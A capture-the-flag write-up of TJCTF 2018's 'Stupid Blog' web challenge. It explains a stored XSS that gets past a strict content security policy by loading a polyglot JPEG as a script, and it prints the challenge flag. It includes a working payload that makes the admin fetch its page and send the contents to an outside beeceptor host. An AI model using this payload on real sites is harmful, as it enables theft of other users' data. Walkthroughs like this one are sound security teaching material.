TJCTF 2018: Stupid Blog

Challenge details

Event	Challenge	Category	Points	Solves
TJCTF 2018	Stupid Blog	Web	130	22 solves

Description

Author: okulkarni

I created this blog site, but it doesn’t do much. I did hide a flag on here though. Maybe you can convince the admin user to give it to you?

TL;DR

Stupid Blog was a stored XSS challenge, where you manage to bypass the CSP using a JPEG file.

Methology

Find the XSS

Once, on the website you have two possibilities, register and login. So I create and account and log me in.

After being logged in, three more possibilities, upload a profile picture (JPEG/PNG), set a post on your “blog” and report a user. Because I had a similar challenge in the EasyCTF (Fumblr), I immediately thought of an XSS.

So I tested a XSS in the post, it was well injected, but not executed… The fault of the very strict CSP.

content-security-policy: default-src 'self'

Now, I know that I need to bypass the CSP to execute Javascript on my profile page. So, when I report my account to the admin, he will execute it.

Bypass the CSP

Since we have an image upload and a strict CSP to bypass, I thought of an article from Gareth Heyes on PortSwigger about that. So I reused his PoC image to bypass the CSP.

His PoC contains among other things, this Javascript:

*/=alert("Burp rocks.");/*

I replace it with my payload:

*/=x=new XMLHttpRequest();x.open("GET","admin",false);x.send(null);document.location="http://drstache.proxy.beeceptor.com/y"+x.responseText;/*

The payload will force the admin to GET his blog page and send the entire content to http://drstache.proxy.beeceptor.com.

Next, we need to use the XSS to import our polyglot JPEG as a script, to do so, I post <script charset="ISO-8859-1" src="ggg/pfp"></script> on my blog.

The last step is to report my user to the admin, and wait for him to go on my profile.

After a few minutes a request was sent to my beeceptor by the admin \o7

It contains the whole admin page, the flag was in.

Flag

tjctf{1m4g3_p0lygl0t_1s_w3ird}

DrStache